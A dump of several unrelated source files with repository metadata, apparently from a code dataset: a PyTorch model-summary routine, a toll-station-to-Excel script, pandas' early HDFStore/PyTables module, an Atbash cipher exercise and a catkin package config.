                    input_size=list(input[0].size()),
                    output_size=list(output.size()),
                    num_parameters=params,
                    multiply_adds=flops)
            )

        # Skip pure containers and the root module — only leaves are hooked.
        if not isinstance(module, nn.ModuleList) \
           and not isinstance(module, nn.Sequential) \
           and module != model:
            hooks.append(module.register_forward_hook(hook))

    model.apply(add_hooks)

    space_len = item_length

    # Single profiling pass; hooks populate `summary` as layers execute.
    model(*input_tensors)
    for hook in hooks:
        hook.remove()

    details = ''
    if verbose:
        # Fixed-width table header.
        details = "Model Summary" + \
            os.linesep + \
            "Name{}Input Size{}Output Size{}Parameters{}Multiply Adds (Flops){}".format(
                ' ' * (space_len - len("Name")),
                ' ' * (space_len - len("Input Size")),
                ' ' * (space_len - len("Output Size")),
                ' ' * (space_len - len("Parameters")),
                ' ' * (space_len - len("Multiply Adds (Flops)"))) \
            + os.linesep + '-' * space_len * 5 + os.linesep

    params_sum = 0
    flops_sum = 0
    for layer in summary:
        params_sum += layer.num_parameters
        if layer.multiply_adds != "Not Available":
            flops_sum += layer.multiply_adds
        if verbose:
            details += "{}{}{}{}{}{}{}{}{}{}".format(
                layer.name,
                ' ' * (space_len - len(layer.name)),
                layer.input_size,
                ' ' * (space_len - len(str(layer.input_size))),
                layer.output_size,
                ' ' * (space_len - len(str(layer.output_size))),
                layer.num_parameters,
                ' ' * (space_len - len(str(layer.num_parameters))),
                layer.multiply_adds,
                ' ' * (space_len - len(str(layer.multiply_adds)))) \
                + os.linesep + '-' * space_len * 5 + os.linesep

    # Totals (FLOPs reported in GFLOPs, 1024**3 divisor).
    details += os.linesep \
        + "Total Parameters: {:,}".format(params_sum) \
        + os.linesep + '-' * space_len * 5 + os.linesep
    details += "Total Multiply Adds (For Convolution and Linear Layers only): {:,} GFLOPs".format(flops_sum/(1024**3)) \
        + os.linesep + '-' * space_len * 5 + os.linesep
    details += "Number of Layers" + os.linesep
    for layer in layer_instances:
        details += "{} : {} layers   ".format(layer, layer_instances[layer])

    return details
|
[
"[email protected]"
] | |
2954d8e87acd58471c0442c2ef128a0d55a74d62
|
e00d8b1b7fc1d6425de2fe4538e84ccb9ccda452
|
/itc/hebei_toll.py
|
18b358874da6553e9bb06dd7a2c23613e0dbd413
|
[] |
no_license
|
yiruiduan/2018-07
|
64ffcc8988330bfd912bdf7f44d32ca3889a81d3
|
36471f3458abb96462021e3588ed2ebf9abfc739
|
refs/heads/master
| 2021-07-10T19:19:28.322710 | 2019-01-08T06:00:44 | 2019-01-08T06:00:44 | 135,425,614 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 812 |
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import xlwt
import re

# Convert a toll-station text dump into a spreadsheet: lines starting with
# "###" open a new worksheet (named after the first CJK run on the line);
# lines starting with "所属高速:" hold fullwidth-colon-separated fields
# written one row at a time into the current worksheet.
workbook = xlwt.Workbook(encoding='ascii')
pattern = re.compile(u'[\u4e00-\u9fa5]+')
with open("河北北京天津收费站.txt", "r", encoding="utf-8") as source:
    for line in source:
        if line.startswith("###"):
            cjk_runs = re.findall(pattern, line)
            worksheet = workbook.add_sheet(cjk_runs[0])
            worksheet.write(0, 1, label="所属高速")
            worksheet.write(0, 2, label="高速名称")
            i = 1
        if line.startswith("所属高速:"):
            fields = line.strip().split(":")
            for col in range(3):
                worksheet.write(i, col, label=fields[col])
            i += 1
# NOTE(review): xlwt emits legacy .xls data; the .xlsx extension is kept
# from the original script — confirm downstream readers accept it.
workbook.save("河北北京天津高速.xlsx")
|
[
"[email protected]"
] | |
30b9aecd5b9ce921e51813aabafbfb4ec0a9ce8f
|
759211e54accb3c8b1375dca1f2a6f4738e8c6c2
|
/pandas/io/pytables.py
|
38e6c30a3dbd3913ce73fefaf73ca4cb26e3a59c
|
[
"BSD-3-Clause"
] |
permissive
|
rkabir/pandas
|
fc92b88d171f34be35537027c0ec09c9c84225f5
|
877e5962f7d6b0e2444f108569c7d1264db5423f
|
refs/heads/master
| 2021-01-18T11:59:31.831230 | 2011-09-18T22:40:30 | 2011-09-18T22:40:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 27,689 |
py
|
"""
High level interface to PyTables for reading and writing pandas data structures
to disk
"""
# pylint: disable-msg=E1101,W0613,W0603
from datetime import datetime
import time
import numpy as np
from pandas import (Series, TimeSeries, DataFrame, Panel, LongPanel,
MultiIndex)
from pandas.core.common import adjoin
import pandas._tseries as _tseries
# reading and writing the full object in one go

# pandas container type -> storage kind tag written to the HDF5 group.
_TYPE_MAP = {
    Series     : 'series',
    TimeSeries : 'series',
    DataFrame  : 'frame',
    Panel      : 'wide',
    LongPanel  : 'long'
}

# storage kind tag -> human-readable name shown by HDFStore.__repr__.
_NAME_MAP = {
    'series' : 'Series',
    'time_series' : 'TimeSeries',
    'frame' : 'DataFrame',
    'frame_table' : 'DataFrame (Table)',
    'wide' : 'Panel',
    'wide_table' : 'Panel (Table)',
    'long' : 'LongPanel',

    # legacy h5 files
    'Series' : 'Series',
    'TimeSeries' : 'TimeSeries',
    'DataFrame' : 'DataFrame',
    'DataMatrix' : 'DataMatrix'
}

# legacy handlers
# kind tag found in legacy h5 files -> reader-method suffix to dispatch to.
_LEGACY_MAP = {
    'Series' : 'legacy_series',
    'TimeSeries' : 'legacy_series',
    'DataFrame' : 'legacy_frame',
    'DataMatrix' : 'legacy_frame'
}

# oh the troubles to reduce import time
# Lazily-populated PyTables module cache; see _tables().
_table_mod = None
def _tables():
    """Import PyTables on first use and cache the module object globally."""
    global _table_mod
    if _table_mod is not None:
        return _table_mod
    import tables
    _table_mod = tables
    return _table_mod
class HDFStore(object):
    """
    dict-like IO interface for storing pandas objects in PyTables
    format.

    DataFrame and Panel can be stored in Table format, which is slower to
    read and write but can be searched and manipulated more like an SQL
    table. See HDFStore.put for more information

    Parameters
    ----------
    path : string
        File path to HDF5 file
    mode : {'a', 'w', 'r', 'r+'}, default 'a'

        ``'r'``
            Read-only; no data can be modified.
        ``'w``'
            Write; a new file is created (an existing file with the same
            name would be deleted).
        ``'a'``
            Append; an existing file is opened for reading and writing,
            and if the file does not exist it is created.
        ``'r+'``
            It is similar to ``'a'``, but the file must already exist.
    complevel : int, 1-9, default 0
        If a complib is specified compression will be applied
        where possible
    complib : {'zlib', 'bzip2', 'lzo', 'blosc', None}, default None
        If complevel is > 0 apply compression to objects written
        in the store wherever possible
    fletcher32 : bool, default False
        If applying compression use the fletcher32 checksum

    Examples
    --------
    >>> store = HDFStore('test.h5')
    >>> store['foo'] = bar   # write to HDF5
    >>> bar = store['foo']   # retrieve
    >>> store.close()
    """
    # When False, _read_panel_table warns about duplicate table entries.
    _quiet = False

    def __init__(self, path, mode='a', complevel=None, complib=None,
                 fletcher32=False):
        # Fail fast when PyTables is not installed.
        try:
            import tables as _
        except ImportError: # pragma: no cover
            raise Exception('HDFStore requires PyTables')

        self.path = path
        self.mode = mode
        self.handle = None
        self.complevel = complevel
        self.complib = complib
        self.fletcher32 = fletcher32
        self.filters = None
        self.open(mode=mode, warn=False)

    def __getitem__(self, key):
        # store['foo'] delegates to get().
        return self.get(key)

    def __setitem__(self, key, value):
        # store['foo'] = obj delegates to put() with default options.
        self.put(key, value)

    def __len__(self):
        # Number of top-level nodes stored in the file.
        return len(self.handle.root._v_children)

    def __repr__(self):
        # File path plus an aligned listing of stored keys and their kinds.
        output = '%s\nFile path: %s\n' % (type(self), self.path)

        if len(self) > 0:
            keys = []
            values = []
            for k, v in sorted(self.handle.root._v_children.iteritems()):
                kind = v._v_attrs.pandas_type

                keys.append(str(k))
                values.append(_NAME_MAP[kind])

            output += adjoin(5, keys, values)
        else:
            output += 'Empty'

        return output

    def open(self, mode='a', warn=True):
        """
        Open the file in the specified mode

        Parameters
        ----------
        mode : {'a', 'w', 'r', 'r+'}, default 'a'
            See HDFStore docstring or tables.openFile for info about modes
        """
        self.mode = mode
        if warn and mode == 'w': # pragma: no cover
            # Interactive confirmation before truncating an existing file.
            while True:
                response = raw_input("Re-opening as mode='w' will delete the "
                                     "current file. Continue (y/n)?")
                if response == 'y':
                    break
                elif response == 'n':
                    return
        if self.handle is not None and self.handle.isopen:
            self.handle.close()

        if self.complib is not None:
            # complib without an explicit level implies maximum compression.
            if self.complevel is None:
                self.complevel = 9
            self.filters = _tables().Filters(self.complevel,
                                             self.complib,
                                             fletcher32=self.fletcher32)

        self.handle = _tables().openFile(self.path, self.mode)

    def close(self):
        """
        Close the PyTables file handle
        """
        self.handle.close()

    def flush(self):
        """
        Force all buffered modifications to be written to disk
        """
        self.handle.flush()

    def get(self, key):
        """
        Retrieve pandas object stored in file

        Parameters
        ----------
        key : object

        Returns
        -------
        obj : type of object stored in file
        """
        try:
            group = getattr(self.handle.root, key)
            return self._read_group(group)
        except AttributeError:
            # missing key; re-raised unchanged for the caller to handle
            raise

    def select(self, key, where=None):
        """
        Retrieve pandas object stored in file, optionally based on where
        criteria

        Parameters
        ----------
        key : object
        where : list, optional

            Must be a list of dict objects of the following forms. Selection can
            be performed on the 'index' or 'column' fields.

            Comparison op
               {'field' : 'index',
                'op' : '>=',
                'value' : value}

            Match single value
               {'field' : 'index',
                'value' : v1}

            Match a set of values
               {'field' : 'index',
                'value' : [v1, v2, v3]}
        """
        group = getattr(self.handle.root, key, None)
        # NOTE(review): pandas_type is read before the None check below, so a
        # missing key raises AttributeError here rather than returning None.
        if 'table' not in group._v_attrs.pandas_type:
            raise Exception('can only select on objects written as tables')
        if group is not None:
            return self._read_group(group, where)

    def put(self, key, value, table=False, append=False,
            compression=None):
        """
        Store object in HDFStore

        Parameters
        ----------
        key : object
        value : {Series, DataFrame, Panel, LongPanel}
        table : boolean, default False
            Write as a PyTables Table structure which may perform worse but
            allow more flexible operations like searching / selecting subsets of
            the data
        append : boolean, default False
            For table data structures, append the input data to the existing
            table
        compression : {None, 'blosc', 'lzo', 'zlib'}, default None
            Use a compression algorithm to compress the data
            If None, the compression settings specified in the ctor will
            be used.
        """
        self._write_to_group(key, value, table=table, append=append,
                             comp=compression)

    def _get_handler(self, op, kind):
        # Dispatch to e.g. _write_frame / _read_wide_table by name.
        return getattr(self, '_%s_%s' % (op, kind))

    def remove(self, key, where=None):
        """
        Remove pandas object partially by specifying the where condition

        Parameters
        ----------
        key : string
            Node to remove or delete rows from
        where : list
            For Table node, delete specified rows. See HDFStore.select for more
            information

        Parameters
        ----------
        key : object
        """
        if where is None:
            # remove the whole node
            self.handle.removeNode(self.handle.root, key, recursive=True)
        else:
            # delete matching rows from a Table node
            group = getattr(self.handle.root, key)
            self._delete_from_table(group, where)

    def append(self, key, value):
        """
        Append to Table in file. Node must already exist and be Table
        format.

        Parameters
        ----------
        key : object
        value : {Series, DataFrame, Panel, LongPanel}

        Notes
        -----
        Does *not* check if data being appended overlaps with existing
        data in the table, so be careful
        """
        self._write_to_group(key, value, table=True, append=True)

    def _write_to_group(self, key, value, table=False, append=False,
                        comp=None):
        # Create (or fetch) the group node, then dispatch to the writer
        # matching the pandas type and the table/non-table storage format.
        root = self.handle.root
        if key not in root._v_children:
            group = self.handle.createGroup(root, key)
        else:
            group = getattr(root, key)

        kind = _TYPE_MAP[type(value)]
        if table or (append and _is_table_type(group)):
            kind = '%s_table' % kind
            handler = self._get_handler(op='write', kind=kind)
            wrapper = lambda value: handler(group, value, append=append,
                                            comp=comp)
        else:
            if append:
                raise ValueError('Can only append to Tables')
            if comp:
                raise ValueError('Compression only supported on Tables')

            handler = self._get_handler(op='write', kind=kind)
            wrapper = lambda value: handler(group, value)

        wrapper(value)
        # Tag the group so readers know which handler to use.
        group._v_attrs.pandas_type = kind

    def _write_series(self, group, series):
        # A Series is stored as its index plus a values array.
        self._write_index(group, 'index', series.index)
        self._write_array(group, 'values', series.values)

    def _write_frame(self, group, df):
        self._write_block_manager(group, df._data)

    def _read_frame(self, group, where=None):
        return DataFrame(self._read_block_manager(group))

    def _write_block_manager(self, group, data):
        # Persist a BlockManager: axes plus one (items, values) pair per block.
        if not data.is_consolidated():
            data = data.consolidate()

        group._v_attrs.ndim = data.ndim
        for i, ax in enumerate(data.axes):
            self._write_index(group, 'axis%d' % i, ax)

        # Supporting mixed-type DataFrame objects...nontrivial
        nblocks = len(data.blocks)
        group._v_attrs.nblocks = nblocks
        for i in range(nblocks):
            blk = data.blocks[i]
            self._write_index(group, 'block%d_items' % i, blk.items)
            self._write_array(group, 'block%d_values' % i, blk.values)

    def _read_block_manager(self, group):
        # Inverse of _write_block_manager.
        from pandas.core.internals import BlockManager, make_block

        ndim = group._v_attrs.ndim
        nblocks = group._v_attrs.nblocks

        axes = []
        for i in xrange(ndim):
            ax = self._read_index(group, 'axis%d' % i)
            axes.append(ax)
        items = axes[0]

        blocks = []
        for i in range(group._v_attrs.nblocks):
            blk_items = self._read_index(group, 'block%d_items' % i)
            values = _read_array(group, 'block%d_values' % i)
            blk = make_block(values, blk_items, items)
            blocks.append(blk)

        return BlockManager(blocks, axes)

    def _write_frame_table(self, group, df, append=False, comp=None):
        # A DataFrame is stored as a 1-item Panel table.
        mat = df.values
        values = mat.reshape((1,) + mat.shape)

        if df._is_mixed_type:
            raise Exception('Cannot currently store mixed-type DataFrame '
                            'objects in Table format')

        self._write_table(group, items=['value'],
                          index=df.index, columns=df.columns,
                          values=values, append=append, compression=comp)

    def _write_wide(self, group, panel):
        panel._consolidate_inplace()
        self._write_block_manager(group, panel._data)

    def _read_wide(self, group, where=None):
        return Panel(self._read_block_manager(group))

    def _write_wide_table(self, group, panel, append=False, comp=None):
        self._write_table(group, items=panel.items, index=panel.major_axis,
                          columns=panel.minor_axis, values=panel.values,
                          append=append, compression=comp)

    def _read_wide_table(self, group, where=None):
        return self._read_panel_table(group, where)

    def _write_long(self, group, panel, append=False):
        # A LongPanel is stored as its three indexes, the two label arrays
        # of the MultiIndex, and the values.
        self._write_index(group, 'major_axis', panel.major_axis)
        self._write_index(group, 'minor_axis', panel.minor_axis)
        self._write_index(group, 'items', panel.items)
        self._write_array(group, 'major_labels', panel.major_labels)
        self._write_array(group, 'minor_labels', panel.minor_labels)
        self._write_array(group, 'values', panel.values)

    def _read_long(self, group, where=None):
        from pandas.core.index import MultiIndex

        items = self._read_index(group, 'items')
        major_axis = self._read_index(group, 'major_axis')
        minor_axis = self._read_index(group, 'minor_axis')
        major_labels = _read_array(group, 'major_labels')
        minor_labels = _read_array(group, 'minor_labels')

        index = MultiIndex(levels=[major_axis, minor_axis],
                           labels=[major_labels, minor_labels])
        return LongPanel(values, index=index, columns=items)

    def _write_index(self, group, key, index):
        # MultiIndex and flat Index are stored differently; a *_variety
        # attribute records which reader to use.
        if isinstance(index, MultiIndex):
            setattr(group._v_attrs, '%s_variety' % key, 'multi')
            self._write_multi_index(group, key, index)
        else:
            setattr(group._v_attrs, '%s_variety' % key, 'regular')
            converted, kind, _ = _convert_index(index)
            self._write_array(group, key, converted)
            node = getattr(group, key)
            node._v_attrs.kind = kind

    def _read_index(self, group, key):
        try:
            variety = getattr(group._v_attrs, '%s_variety' % key)
        except Exception:
            # files written before *_variety existed are all regular
            variety = 'regular'

        if variety == 'multi':
            return self._read_multi_index(group, key)
        elif variety == 'regular':
            _, index = self._read_index_node(getattr(group, key))
            return index
        else:  # pragma: no cover
            raise Exception('unrecognized index variety')

    def _write_multi_index(self, group, key, index):
        setattr(group._v_attrs, '%s_nlevels' % key, index.nlevels)

        for i, (lev, lab, name) in enumerate(zip(index.levels,
                                                 index.labels,
                                                 index.names)):
            # write the level
            conv_level, kind, _ = _convert_index(lev)
            level_key = '%s_level%d' % (key, i)
            self._write_array(group, level_key, conv_level)
            node = getattr(group, level_key)
            node._v_attrs.kind = kind
            node._v_attrs.name = name

            # write the name
            setattr(node._v_attrs, '%s_name%d' % (key, i), name)

            # write the labels
            label_key = '%s_label%d' % (key, i)
            self._write_array(group, label_key, lab)

    def _read_multi_index(self, group, key):
        nlevels = getattr(group._v_attrs, '%s_nlevels' % key)

        levels = []
        labels = []
        names = []
        for i in range(nlevels):
            level_key = '%s_level%d' % (key, i)
            name, lev = self._read_index_node(getattr(group, level_key))
            levels.append(lev)
            names.append(name)

            label_key = '%s_label%d' % (key, i)
            lab = getattr(group, label_key)[:]
            labels.append(lab)

        return MultiIndex(levels=levels, labels=labels, names=names)

    def _read_index_node(self, node):
        # Returns (name, index); name is None for files without the attr.
        data = node[:]
        kind = node._v_attrs.kind

        try:
            name = node._v_attrs.name
        except Exception:
            name = None

        return name, _unconvert_index(data, kind)

    def _write_array(self, group, key, value):
        # Overwrite any existing node of the same name.
        if key in group:
            self.handle.removeNode(group, key)

        if self.filters is not None:
            atom = None
            try:
                # get the atom for this datatype
                atom = _tables().Atom.from_dtype(value.dtype)
            except ValueError:
                pass

            if atom is not None:
                # create an empty chunked array and fill it from value
                ca = self.handle.createCArray(group, key, atom,
                                              value.shape,
                                              filters=self.filters)
                ca[:] = value
                return

        if value.dtype == np.object_:
            # object arrays go through a variable-length pickle atom
            vlarr = self.handle.createVLArray(group, key,
                                              _tables().ObjectAtom())
            vlarr.append(value)
        else:
            self.handle.createArray(group, key, value)

    def _write_table(self, group, items=None, index=None, columns=None,
                     values=None, append=False, compression=None):
        """ need to check for conform to the existing table:
        e.g. columns should match """
        # create dict of types
        index_converted, index_kind, index_t = _convert_index(index)
        columns_converted, cols_kind, col_t = _convert_index(columns)

        # create the table if it doesn't exist (or get it if it does)
        if not append:
            if 'table' in group:
                self.handle.removeNode(group, 'table')

        if 'table' not in group:
            # create the table
            desc = {'index'  : index_t,
                    'column' : col_t,
                    'values' : _tables().FloatCol(shape=(len(values)))}

            options = {'name' : 'table',
                       'description' : desc}

            if compression:
                # per-call compression overrides the store-level filters
                complevel = self.complevel
                if complevel is None:
                    complevel = 9
                filters = _tables().Filters(complevel=complevel,
                                            complib=compression,
                                            fletcher32=self.fletcher32)
                options['filters'] = filters
            elif self.filters is not None:
                options['filters'] = self.filters

            table = self.handle.createTable(group, **options)
        else:
            # the table must already exist
            table = getattr(group, 'table', None)

        # add kinds
        table._v_attrs.index_kind = index_kind
        table._v_attrs.columns_kind = cols_kind
        table._v_attrs.fields = list(items)

        # add the rows
        try:
            for i, index in enumerate(index_converted):
                for c, col in enumerate(columns_converted):
                    v = values[:, i, c]

                    # don't store the row if all values are np.nan
                    if np.isnan(v).all():
                        continue

                    row = table.row
                    row['index'] = index
                    row['column'] = col

                    # create the values array
                    row['values'] = v
                    row.append()
            self.handle.flush()
        except (ValueError), detail: # pragma: no cover
            print "value_error in _write_table -> %s" % str(detail)
            try:
                self.handle.flush()
            except Exception:
                pass
            raise

    def _read_group(self, group, where=None):
        # Dispatch on the stored kind tag (mapping legacy tags first).
        kind = group._v_attrs.pandas_type
        kind = _LEGACY_MAP.get(kind, kind)
        handler = self._get_handler(op='read', kind=kind)
        return handler(group, where)

    def _read_series(self, group, where=None):
        index = self._read_index(group, 'index')
        values = _read_array(group, 'values')
        return Series(values, index=index)

    def _read_legacy_series(self, group, where=None):
        index = self._read_index_legacy(group, 'index')
        values = _read_array(group, 'values')
        return Series(values, index=index)

    def _read_legacy_frame(self, group, where=None):
        index = self._read_index_legacy(group, 'index')
        columns = self._read_index_legacy(group, 'columns')
        values = _read_array(group, 'values')
        return DataFrame(values, index=index, columns=columns)

    def _read_index_legacy(self, group, key):
        node = getattr(group, key)
        data = node[:]
        kind = node._v_attrs.kind

        return _unconvert_index_legacy(data, kind)

    def _read_frame_table(self, group, where=None):
        # frame tables are stored as a 1-item panel table; unwrap it
        return self._read_panel_table(group, where)['value']

    def _read_panel_table(self, group, where=None):
        from pandas.core.common import _asarray_tuplesafe

        table = getattr(group, 'table')

        # create the selection
        sel = Selection(table, where)
        sel.select()
        fields = table._v_attrs.fields

        columns = _maybe_convert(sel.values['column'],
                                 table._v_attrs.columns_kind)
        index = _maybe_convert(sel.values['index'],
                               table._v_attrs.index_kind)
        # reconstruct
        long_index = MultiIndex.from_arrays([index, columns])
        lp = LongPanel(sel.values['values'], index=long_index,
                       columns=fields)

        if lp.consistent:
            lp = lp.sortlevel(level=0)
            wp = lp.to_wide()
        else:
            # Duplicate (index, column) pairs: keep the most recently
            # appended row for each unique pair.
            if not self._quiet:
                print ('Duplicate entries in table, taking most recently '
                       'appended')

            # need a better algorithm
            tuple_index = long_index.get_tuple_index()
            index_map = _tseries.map_indices_buf(tuple_index)

            unique_tuples = _tseries.fast_unique(tuple_index)
            unique_tuples = _asarray_tuplesafe(unique_tuples)

            indexer, _ = _tseries.getMergeVec(unique_tuples, index_map)

            new_index = long_index.take(indexer)
            new_values = lp.values.take(indexer, axis=0)
            lp = LongPanel(new_values, index=new_index, columns=lp.columns)
            wp = lp.to_wide()

        if sel.column_filter:
            # large 'in' filters are applied after the read, on the axis
            new_minor = sorted(set(wp.minor_axis) & sel.column_filter)
            wp = wp.reindex(minor=new_minor)
        return wp

    def _delete_from_table(self, group, where = None):
        # Delete rows matching `where`; returns the number of rows removed.
        table = getattr(group, 'table')

        # create the selection
        s = Selection(table, where)
        s.select_coords()

        # delete the rows in reverse order
        l = list(s.values)
        l.reverse()
        for c in l:
            table.removeRows(c)
        self.handle.flush()
        return len(s.values)
def _convert_index(index):
    """Convert an index's values into a PyTables-storable form.

    Returns a ``(converted_values, kind_string, pytables_column_atom)``
    tuple; ``kind_string`` is later used by ``_unconvert_index`` to
    rebuild the index. Raises ValueError for unsupported element types.
    """
    # Let's assume the index is homogeneous
    values = np.asarray(index)

    if isinstance(values[0], datetime):
        # Stored as epoch seconds. Fix: removed the redundant
        # function-local `import time` (time is imported at module level).
        converted = np.array([time.mktime(v.timetuple())
                              for v in values], dtype=np.int64)
        return converted, 'datetime', _tables().Time64Col()
    elif isinstance(values[0], basestring):
        converted = np.array(list(values), dtype=np.str_)
        itemsize = converted.dtype.itemsize
        return converted, 'string', _tables().StringCol(itemsize)
    elif isinstance(values[0], (long, int, np.integer)):
        # take a guess for now, hope the values fit
        atom = _tables().Int64Col()
        return np.asarray(values, dtype=np.int64), 'integer', atom
    else:  # pragma: no cover
        raise ValueError('unrecognized index type %s' % type(values[0]))
def _read_array(group, key):
    """Read an array node back; VLArrays unwrap to their single stored
    object (see _write_array's object-dtype path)."""
    import tables
    node = getattr(group, key)
    data = node[:]
    return data[0] if isinstance(node, tables.VLArray) else data
def _unconvert_index(data, kind):
if kind == 'datetime':
index = np.array([datetime.fromtimestamp(v) for v in data],
dtype=object)
elif kind in ('string', 'integer'):
index = np.array(data, dtype=object)
else: # pragma: no cover
raise ValueError('unrecognized index type %s' % kind)
return index
def _unconvert_index_legacy(data, kind, legacy=False):
if kind == 'datetime':
index = _tseries.array_to_datetime(data)
elif kind in ('string', 'integer'):
index = np.array(data, dtype=object)
else: # pragma: no cover
raise ValueError('unrecognized index type %s' % kind)
return index
def _maybe_convert(values, val_kind):
    """Apply the kind-specific converter elementwise when one is needed."""
    if not _need_convert(val_kind):
        return values
    conv = np.frompyfunc(_get_converter(val_kind), 1, 1)
    return conv(values)
def _get_converter(kind):
if kind == 'datetime':
return datetime.fromtimestamp
else: # pragma: no cover
raise ValueError('invalid kind %s' % kind)
def _need_convert(kind):
if kind == 'datetime':
return True
return False
def _is_table_type(group):
try:
return 'table' in group._v_attrs.pandas_type
except AttributeError:
# new node, e.g.
return False
class Selection(object):
    """
    Carries out a selection operation on a tables.Table object.

    Parameters
    ----------
    table : tables.Table
    where : list of dicts of the following form

        Comparison op
           {'field' : 'index',
            'op' : '>=',
            'value' : value}

        Match single value
           {'field' : 'index',
            'value' : v1}

        Match a set of values
           {'field' : 'index',
            'value' : [v1, v2, v3]}
    """
    def __init__(self, table, where=None):
        self.table = table
        self.where = where
        # set-based post-read filter used when an 'in' list is too large
        # for a PyTables condition string (see generate_multiple_conditions)
        self.column_filter = None
        # the combined PyTables condition string, or None
        self.the_condition = None
        self.conditions = []
        self.values = None
        if where:
            self.generate(where)

    def generate(self, where):
        # AND together one condition per `where` entry
        for c in where:
            op = c.get('op', None)
            value = c['value']
            field = c['field']

            if field == 'index' and isinstance(value, datetime):
                # datetimes are stored as epoch seconds; compare numerically
                value = time.mktime(value.timetuple())
                self.conditions.append('(%s %s %s)' % (field, op, value))
            else:
                self.generate_multiple_conditions(op, value, field)

        if len(self.conditions):
            self.the_condition = '(' + ' & '.join(self.conditions) + ')'

    def generate_multiple_conditions(self, op, value, field):

        if op and op == 'in' or isinstance(value, (list, np.ndarray)):
            if len(value) <= 61:
                # small sets become an OR'd condition string; larger sets
                # fall back to a post-read column_filter
                l = '(' + ' | '.join([ "(%s == '%s')" % (field, v)
                                       for v in value ]) + ')'
                self.conditions.append(l)
            else:
                self.column_filter = set(value)
        else:
            if op is None:
                # missing op defaults to equality
                op = '=='
            self.conditions.append('(%s %s "%s")' % (field, op, value))

    def select(self):
        """
        generate the selection
        """
        if self.the_condition:
            self.values = self.table.readWhere(self.the_condition)
        else:
            self.values = self.table.read()

    def select_coords(self):
        """
        generate the selection
        """
        # row coordinates (not data) matching the condition, for deletion
        self.values = self.table.getWhereList(self.the_condition)
|
[
"[email protected]"
] | |
bdd739e1d194e3350e8d261608f052aa2d1cd68a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/atbash-cipher/780f7c2ca2024289b7e86d67c77cdb0a.py
|
f4cb4e0b4a787f169f151619ad13150dc07cb867
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 769 |
py
|
import re
def decode(ciphertext):
    """Decode an Atbash cipher: mirror letters (a<->z), keep digits,
    drop every other character."""
    decoded = []
    for ch in ciphertext:
        if ch.isalpha():
            decoded.append(chr(ord('a') + (ord('z') - ord(ch))))
        elif ch.isdigit():
            decoded.append(ch)
    return ''.join(decoded)
def encode(plaintext):
    """Atbash-encode: mirror letters (a<->z), keep digits, drop other
    characters, and group the output in blocks of five separated by spaces."""
    translated = ''
    for ch in plaintext.lower():
        if ch.isalpha():
            translated += chr(ord('z') - (ord(ch) - ord('a')))
        elif ch.isdigit():
            translated += ch
    if len(translated) <= 5:
        return translated
    grouped = ''
    idx = 0
    for idx in range(0, len(translated) - 5, 5):
        grouped += translated[idx:idx + 5] + ' '
    # idx stops one group before the end; append the remainder
    grouped += translated[idx + 5:]
    return grouped
|
[
"[email protected]"
] | |
0f7f10326711a4cf4fffb689aed806f4d12d3b06
|
632b94beca62f7c8af5ae1d1e8e095a352600429
|
/build_isolated/moveit_commander/catkin_generated/pkg.develspace.context.pc.py
|
74d5b57eac50e95ed76ceddf9025312701f4f5af
|
[] |
no_license
|
Haoran-Zhao/US_UR3
|
d9eb17a7eceed75bc623be4f4db417a38f5a9f8d
|
a0c25e1daf613bb45dbd08075e3185cb9cd03657
|
refs/heads/master
| 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 401 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
# Machine-generated pkg-config context for the catkin develspace; values are
# substituted at configure time. The empty strings here mean this package
# exports no include dirs, no catkin dependencies and no libraries.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "moveit_commander"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/devel_isolated/moveit_commander"
PROJECT_VERSION = "1.0.1"
|
[
"[email protected]"
] | |
81bffd876a4fdc0b34dd8eb8599fa803daf88a30
|
bd8bc7abe0f774f84d8275c43b2b8c223d757865
|
/368_LargestDivisibleSubset/largestDivisibleSubset.py
|
0e89bdcccb45f3131c6fcbaaeee76f58dde3360f
|
[
"MIT"
] |
permissive
|
excaliburnan/SolutionsOnLeetcodeForZZW
|
bde33ab9aebe9c80d9f16f9a62df72d269c5e187
|
64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7
|
refs/heads/master
| 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 473 |
py
|
class Solution:
    def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
        """Return a largest subset of nums in which every pair of elements
        divides evenly (smaller into larger)."""
        nums.sort()
        # chains[i]: the longest divisible chain found so far that ends
        # at nums[i] (every earlier element divides the next)
        chains = [[value] for value in nums]
        best = []
        for i, value in enumerate(nums):
            for j in range(i):
                if value % nums[j] == 0 and len(chains[j]) + 1 > len(chains[i]):
                    chains[i] = chains[j] + [value]
            if len(chains[i]) > len(best):
                best = chains[i]
        return best
|
[
"[email protected]"
] | |
f91fc4e82fe4ba7dd8fc849c4ffedc5c245bcd1a
|
677fa54f9c8b48a813ff7b207817d1a3acc8ed25
|
/main/lib/idds/tests/run_sql.py
|
2e948042286c38b784fb2d53e1b239de536e453c
|
[
"Apache-2.0"
] |
permissive
|
HSF/iDDS
|
2a88cb35ebbf35c7e3427369a94c6b9d73c16182
|
193a95ec7ee154a2615fa8dcd99a79df5ddd3bec
|
refs/heads/master
| 2023-08-31T11:10:10.410663 | 2023-08-25T14:03:17 | 2023-08-25T14:03:17 | 183,081,241 | 3 | 9 |
NOASSERTION
